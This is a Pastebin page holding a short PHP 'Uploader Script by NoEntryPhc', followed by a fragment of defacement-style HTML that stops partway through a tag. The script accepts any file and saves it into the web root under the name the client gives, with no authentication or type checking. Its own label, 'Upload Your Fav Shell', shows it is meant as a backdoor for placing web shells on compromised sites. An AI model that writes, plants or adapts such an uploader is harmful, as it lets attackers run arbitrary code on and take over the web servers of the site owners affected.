Advertisement
michaeljohn

Uploader Script by NoEntry Phc

Aug 2nd, 2013
84
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.95 KB | None | 0 0
  1. <center>Code By NoEntryPhc</center><html><body text="red" bgcolor="white"> <?$uploaddir = './';$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);if ( isset($_FILES["userfile"]) ) {echo "Upload ";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))echo $uploadfile;else echo "failed";} ?> <p align="center"><font face="Arial" color="#808080"><b>Upload Your Fav Shell</b></font><p align="center"><b><font face="Arial">Created By :</font></b><font face="Tahoma"><strong> NoEntryPhc</strong></font></p><form name="uplform" method="post" action="<?=$PHP_SELF?>"enctype="multipart/form-data"><p align="center"><input type="file" name="userfile"><input type="submit"></p></body></html>    
  2.  
  3.  
  4.  
  5. <body background="http://i1004.photobucket.com/albums/af163/imnu11/openbg.gif">
  6.  
  7.  
  8.  
  9. <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br> <marquee style="font-family: Bradley Hand ITC; font-size: 14pt; font-weight: bold;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement